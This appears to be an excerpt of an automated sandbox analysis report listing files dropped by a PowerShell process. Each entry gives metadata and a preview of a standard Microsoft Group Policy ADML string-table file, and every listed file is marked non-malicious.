                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CredUI">Credential User Interface</string>.. <string id="CredUI_Help">Contains settings to control the behavior of credential collection.</string>.. <string id="EnumerateAdministrators">Enumerate administrator accounts on elevation</string>.. <string id="EnumerateAdministrators_Help">This policy setting controls whether administrator accounts are displayed when a user attempts to elevate a running application. By default, administrator accounts are not displayed when the user attempts to elevate a ru
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (479), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5460
                                                                                          Entropy (8bit):4.757258895669925
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DefaultLogonDomain">Assign a default domain for logon</string>.. <string id="DefaultLogonDomain_Help">This policy setting specifies a default logon domain, which might be a different domain than the domain to which the computer is joined. Without this policy setting, at logon, if a user does not specify a domain for logon, the domain to which the computer belongs is assumed as the default domain. For example if the computer belongs to the Fabrikam domain, the default domain for user logon is Fabrikam. ....If y
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (353), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):3490
                                                                                          Entropy (8bit):4.799993012083926
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CADOptions">Ctrl+Alt+Del Options</string>.. <string id="DisableChangePassword">Remove Change Password</string>.. <string id="DisableChangePassword_Help">This policy setting prevents users from changing their Windows password on demand.....If you enable this policy setting, the 'Change Password' button on the Windows Security dialog box will not appear when you press Ctrl+Alt+Del.....However, users are still able to change their password when prompted by the system. The system prompts users for a new pass
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (507), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5072
                                                                                          Entropy (8bit):4.789995597871682
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DCOM">Distributed COM</string>.. <string id="DCOMActivationSecurityCheckAllowLocalList">Allow local activation security check exemptions</string>.. <string id="DCOMActivationSecurityCheckAllowLocalList_Explain">Allows you to specify that local computer administrators can supplement the "Define Activation Security Check exemptions" list.....If you enable this policy setting, and DCOM does not find an explicit entry for a DCOM server application id (appid) in the "Define Activation Security Check exemptions
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1550
                                                                                          Entropy (8bit):4.934966284712348
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DFSDiscoverDC">Configure how often a DFS client discovers domain controllers</string>.. <string id="DFSDiscoverDC_Help">This policy setting allows you to configure how often a Distributed File System (DFS) client attempts to discover domain controllers on a network. By default, a DFS client attempts to discover domain controllers every 15 minutes.....If you enable this policy setting, you can configure how often a DFS client attempts to discover domain controllers. This value is specified in minutes.....If you
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4823
                                                                                          Entropy (8bit):4.829103521253636
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="CAT_DesktopWindowManager">Desktop Window Manager</string>.. <string id="CAT_DesktopWindowManagerColorization">Window Frame Coloring</string>.. <string id="DwmDefaultColorizationColor">Specify a default color</string>.. <string id="DwmDefaultColorizationColorExplain">This policy setting controls the default color for window frames when the user does not specify a color. ....If you enable this policy setting and specify a default color, this color is used in glass window frames, if the user does not sp
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (543), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):22651
                                                                                          Entropy (8bit):4.740040645096249
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:sHlNSiouVHqVHdjZjfYBi1lkmX15/5GYyr2cci:qNSiVs9jBwBiHk0v/5Grrh
                                                                                          MD5:3B0954050C6DFF90CAE771936C61F536
                                                                                          SHA1:5D6D1097DE13011B78271272B87DE55C2BFFCEA8
                                                                                          SHA-256:F8DA2C6952EBABA7C70F5BB5941532A2E6112955E3E340F003581E96BB7B0881
                                                                                          SHA-512:097C9E8A0B5BC0B97777F6A591E7CEF5A2362668B05C42624593069FD4F2E6279EA8D83CBCADA7C973E9E1CCED78B1149889A333021FA904A23BF0D6FBEC06FC
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ActiveDesktop">Desktop</string>.. <string id="ActiveDirectory">Active Directory</string>.. <string id="AD_EnableFilter">Enable filter in Find dialog box</string>.. <string id="AD_EnableFilter_Help">Displays the filter bar above the results of an Active Directory search. The filter bar consists of buttons for applying additional filters to search results.....If you enable this setting, the filter bar appears when the Active Directory Find dialog box opens, but users can hide it.....If you disable this
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1012
                                                                                          Entropy (8bit):5.014566400985145
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yFMNWe2PEYLdFV:cgeD5x8gm8fKOE+FV
                                                                                          MD5:8C5BFC23602CF18E6EC73BDF468C5C65
                                                                                          SHA1:87C49103ECB11F3284DE1311D305CE426DA77573
                                                                                          SHA-256:5FE3FC627DFAEDDEDDD5C617D4DDD1AB367353A97026268C27AB45B8A9025472
                                                                                          SHA-512:ED4BF6B6D7F2F5B248DF14DAA85551613583E8DCFD734266E08296F0DCB52055A2CAD56C23DDFA20EA3315A9DD3B3D538EE673C89E97CFC8D5D9BE39BB575794
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DeviceCompat">Device and Driver Compatibility</string>.. <string id="DeviceFlags">Device compatibility settings</string>.. <string id="DriverShims">Driver compatibility settings</string>.. <string id="DeviceFlags_Help">Changes behavior of Microsoft bus drivers to work with specific devices.</string>.. <string id="DriverShims_Help">Changes behavior of 3rd-party drivers to work around incompatibilities introduced between OS versions.</string>.. </stringTable>.. </resources>..</policyDefinition
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (671), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):20516
                                                                                          Entropy (8bit):4.656487634133671
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:/Zy2dT4b3O+5KeqO+cpm964BNLKsuV2r4tFHsAvRzw3g:/ZBub+EKebxpm97ODVy4rHb5EQ
                                                                                          MD5:B0D80E37838946A958789511D6090800
                                                                                          SHA1:E80EBC94D870B40E9925D9473E83438287A3DF50
                                                                                          SHA-256:EAD0368B0AB7404ADDC0B8BD016E04D43C7A1E370A2875A6785863A53CC94095
                                                                                          SHA-512:A13D7AA56FA39803B8CB441DD6907A0F06E2B89EB478B6C6D57687F0E154DE44EF959411627C33D5652D096E439F6518C624A4F159189C8DA7AD51370FB12AD3
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DeviceInstall_AllowAdminInstall">Allow administrators to override Device Installation Restriction policies</string>.. <string id="DeviceInstall_AllowAdminInstall_Help">This policy setting allows you to determine whether members of the Administrators group can install and update the drivers for any device, regardless of other policy settings.....If you enable this policy setting, members of the Administrators group can use the Add Hardware wizard or the Update Driver wizard to install and update the drivers for
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (308), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8722
                                                                                          Entropy (8bit):4.755555827203055
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pm90hTxQOL2iYoQkdN+Rn+kJu+G6f9Yh3VfPtvCchfvaCz+51qMnHV:EbTmUvQkdN+F+au+G6etntbz+5su
                                                                                          MD5:9E7C326DCCFD5BDAE53F0FF7359042CF
                                                                                          SHA1:BFC33D23A42406EF057AC21BCECA4310C256C901
                                                                                          SHA-256:4E1BC9FDA548EEBF29A499B61CE0462983DD461DB84F4B2C63150636B917036B
                                                                                          SHA-512:96C937F5F6871D7BD0F3FDF0B6D502232C29C6E77DE7B1FD0A79DB4ADBC7EAAFBC0A60C76C8AF6D5D85CA7397A4C995BE385320C64D23076A7658C1B1187A624
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DeviceInstall_BalloonTips">Turn off "Found New Hardware" balloons during device installation</string>.. <string id="DeviceInstall_BalloonTips_Help">This policy setting allows you to turn off "Found New Hardware" balloons during device installation.....If you enable this policy setting, "Found New Hardware" balloons do not appear while a device is being installed.....If you disable or do not configure this policy setting, "Found New Hardware" balloons appear while a device is being installed, unless the driver
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1186
                                                                                          Entropy (8bit):5.006514157459994
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yEgDfJvRl9xCRMRq9MXJz1c2igRE3RwMwFxRjX/5Ron:cgeD5x8gm8fKqTtW9M71ibKMFV
                                                                                          MD5:A4EECA9FC18FD2F595ECC98FD40E0F5F
                                                                                          SHA1:EFBAB95F94C418BE4B025F3CA14BA3441C1D7CE8
                                                                                          SHA-256:348B0A60BCA267759CA52611C67B06AB3347CAB23786C257D984EB7F3F94C6A2
                                                                                          SHA-512:11A2FB546E64CA105CE63E313FCDDE0950939C5981BEEC4D04CEB0C0C43EB573CC3C5444E71BBD12AD04A902CB4D3FC7C41EB4E9BA601232041716CEE0835622
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Digitalx_DiableApplication_TitleText">Do not allow Digital Locker to run</string>.. <string id="Digitalx_DisableApplication_DescriptionText">Specifies whether Digital Locker can run.....Digital Locker is a dedicated download manager associated with Windows Marketplace and a feature of Windows that can be used to manage and download products acquired and stored in the user's Windows Marketplace Digital Locker.....If you enable this setting, Digital Locker will not run.....If you disable or do not configure this
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (349), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4016
                                                                                          Entropy (8bit):4.799918196062888
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmNIlyc4TNq1nCsXGT1fnC7SqnBU+l4vnjzyJ1nCsXGT1fnWmoV:EeIlyc4TN0psngSUG+l4vnjzy3psnWP
                                                                                          MD5:98FB5567E5194E5E7430C553FD07EE50
                                                                                          SHA1:9CD9DE9B3E9FAD928DCBB73225B7F77B21D7F532
                                                                                          SHA-256:3EE2D33B8C14490D4315F669873B1E4747EF4C99CF83CB3214FBE02774DF322D
                                                                                          SHA-512:2DC8749CB1E401E4A7753933861081D80AB9D11D349730289E36FD59EF3F76CFCE63AC71864B7239C05CFAD12F89D7991F1AA79E78751F926A941F82EADD23C3
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. BEGIN: Custom supportedOn strings -->.. <string id="SUPPORTED_WindowsLonghornServerDesktopExperienceOrVista">.. Windows Server 2008 with Desktop Experience installed or Windows Vista.. </string>.. END: Custom supportedOn strings -->.. <string id="DfdAlertPolicy">Disk Diagnostic: Configure custom alert text</string>.. <string id="DfdAlertPolicyExplain">This policy setting substitutes custom alert text in the disk diagnostic message shown to users when a disk reports a S.M.A.R.T. f
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (552), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4247
                                                                                          Entropy (8bit):4.68691343915682
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pm+vfC9KJ5V/MztbEUiTKD48mRCjme9E5J9eWFV:EJN/MdEUiTKs8mwM8Wn
                                                                                          MD5:74FF3350EF82B0E11EF64C762CF28BE3
                                                                                          SHA1:8D7BB871CC583EB03E3E104FDC50FCBC974527EB
                                                                                          SHA-256:D94738C802A64BDA9CCA3947096A97B4DAC05730BD55441ED552595422103A9F
                                                                                          SHA-512:0729601AD1E861F7DA3E39ECC3878A37AFA3E37C92924446B28FA6BDFB4189D024B7F4E5CE0BF29FE4EB3B51DFA98FE07B7A560DDC521FBDAB4E50EA6C6160C2
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="BootResumePolicy">Turn off boot and resume optimizations</string>.. <string id="BootResumePolicyHelp">This policy setting turns off the boot and resume optimizations for the hybrid hard disks in the system.....If you enable this policy setting, the system does not use the non-volatile (NV) cache to optimize boot and resume.....If you disable this policy setting, the system uses the NV cache to achieve faster boot and resume. The system determines the data that will be stored in the NV cache to optimize boot an
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (382), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):9312
                                                                                          Entropy (8bit):4.685669628790155
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:LeD5pmUA7x7OOWbm7kiE7EC/8GxKU0zOZqIc5fKSuBGfvbKqbKJajDrSy5G+YGmI:EOpKz98U0CgfKSFnWqBXrjksmw03Tja
                                                                                          MD5:40CA6688DCC63C37ADC92B8CE44A47E1
                                                                                          SHA1:584E5E4433F642B09081A68167436F41D3615867
                                                                                          SHA-256:9EA35D39FAB49421022E213BE5B8A66404B41BEB2202E17C94BF557FB8C349C4
                                                                                          SHA-512:7711A24BE790431495051BAE7DA407FA961748374C0936CB49FD4F421425C4D92458C5F8E2C356E70923EB91D0DE100D6EB7F401D2EF03A18DD590F7FEF8314A
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DiskQuota">Disk Quotas</string>.. <string id="DQ_Enable">Enable disk quotas</string>.. <string id="DQ_Enable_Help">This policy setting turns on and turns off disk quota management on all NTFS volumes of the computer, and prevents users from changing the setting.....If you enable this policy setting, disk quota management is turned on, and users cannot turn it off.....If you disable the policy setting, disk quota management is turned off, and users cannot turn it on.....If this policy setting is not config
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (575), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1218
                                                                                          Entropy (8bit):4.961559763430255
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yQJmjI7JMHkJNMLsDe7MBMZc1zcqoFV:cgeD5x8gm8fKxmEPnMLkeKMokFV
                                                                                          MD5:8B49ABCA606DF290D14944330F11A796
                                                                                          SHA1:5FD7496C8553485972A7B35E75386A0CB98199AF
                                                                                          SHA-256:25D3882376CC864E14BF8CBD16065971C8C5F1C88FCEF7C60B4213604F893272
                                                                                          SHA-512:F7C3B0CE37F00F281DCDF46A421295D2CD79298852B2302624CD4AFD27EED160FFB4B9003C2096851DD884E8708000282D55876CFC1FA853DCB437FA65D3F8F3
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DLT_AllowDomainMode">Allow Distributed Link Tracking clients to use domain resources</string>.. <string id="DLT_AllowDomainMode_Explain">Specifies that Distributed Link Tracking clients in this domain may use the Distributed Link Tracking (DLT) server, which runs on domain controllers. The DLT client enables programs to track linked files that are moved within an NTFS volume, to another NTFS volume on the same computer, or to an NTFS volume on another computer. The DLT client can more reliably track links
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (896), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):31344
                                                                                          Entropy (8bit):4.717542963262439
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:zlbkZcHOReR932i5D5Zbng2C5stOeoXYaYENfOenLtWeoXYaYENfwleyLLhbxEHq:u5XYlXYfleQlnzmW
                                                                                          MD5:7B88F32185E7AEE9D215D367F531C628
                                                                                          SHA1:086E5D851CBD967E907A54539DA3DE95F2F53916
                                                                                          SHA-256:A60EA72F20C54DC7362CB26A10970B4BEDAC5E257E20317BD2CACA1E289DB08D
                                                                                          SHA-512:70CF1A3642D0C6D6866B713DE7A52857CB550C6490B8C62A9605BEFE3811525C3081DCE9DE9F881C361FE88694C256EB03EA168FD489BE9CB0AC48AE4F244BAE
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DNS_Client">DNS Client</string>.. <string id="DNS_Domain">Connection-specific DNS suffix</string>.. <string id="DNS_Domain_Help">Specifies a connection-specific DNS suffix. This policy setting supersedes local connection-specific DNS suffixes, and those configured using DHCP.....To use this policy setting, click Enabled, and then enter a string value representing the DNS suffix.....If you enable this policy setting, the DNS suffix that you enter will be applied to all network connections used by computers
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):7775
                                                                                          Entropy (8bit):4.801945943527714
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Els7BYDGrS9SqHBf0IpqGKJkPsmcjtJiANpyhSz9zxbBiy:A0bMsBHiANpyh89zxbl
                                                                                          MD5:A2F0FA1F7B955635BAEF6D42E1019FAD
                                                                                          SHA1:52F10ED5BB525A53AD000BAB3D0AD3A8CC696CB9
                                                                                          SHA-256:F54FFC98753D1F03710F912F456B1639B18EC692D2E41FF529A79C5BA8A38B8B
                                                                                          SHA-512:1BB3F4D5A8895C0AA0373E6EBA93636B022BB9709DE40408C46924664A63390593B386EF5A3968F0DBA8DB31F02AFB20455C7AAB95E2498DEB466E89C335D0D9
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="L_IME">IME</string>.. <string id="L_TurnOnMisconversionLoggingForMisconversionReport">Turn on misconversion logging for misconversion report</string>.. <string id="L_TurnOnMisconversionLoggingForMisconversionReportExplain">This policy setting allows you to turn on logging of misconversion for the misconversion report.....If you enable this policy setting, misconversion logging is turned on.....If you disable or do not configure this policy setting, misconversion logging is turned off. ....This policy sett
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with very long lines (335), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2537
                                                                                          Entropy (8bit):4.7263609685346974
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<policyDefinitionResources revision="1.0" schemaVersion="1.0">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ELAMCategory">Early Launch Antimalware</string>.. <string id="POL_DriverLoadPolicy_Name">Boot-Start Driver Initialization Policy</string>.. <string id="POL_DriverLoadPolicy_Name_Help">This policy setting allows you to specify which boot-start drivers are initialized based on a classification determined by an Early Launch Antimalware boot-start driver. The Early Launch Antimalware boot-start driver can return the following classifications for each boot-start driver:..- Good: The driver has been signed and has not been tampered with...- Bad: The driver has been identified as malware. It is recommended that you do not allow known bad drivers to be initialized...- Bad, but required for boot: The driver has been identified as malware, but the computer cannot
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):4475
                                                                                          Entropy (8bit):4.731397984218957
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2011 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="EdgeUI">Edge UI</string>.. <string id="EdgeUI_Help">Contains settings related to system user interfaces attached to the screen edges.</string>.. <string id="TurnOffBackstack">Turn off switching between recent apps</string>.. <string id="TurnOffBackstack_Help">If you enable this setting, users will not be allowed to switch between recent apps. The App Switching option in the PC settings app will be disabled as well.....If you disable or do not configure this policy setting, users will be allowed to sw
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1260
                                                                                          Entropy (8bit):4.910898508580554
                                                                                          Encrypted:false
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NoEncryptOnMove">Do not automatically encrypt files moved to encrypted folders</string>.. <string id="NoEncryptOnMove_Help">This policy setting prevents File Explorer from encrypting files that are moved to an encrypted folder.....If you enable this policy setting, File Explorer will not automatically encrypt files that are moved to an encrypted folder.....If you disable or do not configure this policy setting, File Explorer automatically encrypts files that are moved to an encrypted folder.....This setting ap
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (790), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):30768
                                                                                          Entropy (8bit):4.691623979168484
                                                                                          Encrypted:false
                                                                                          Malicious:false
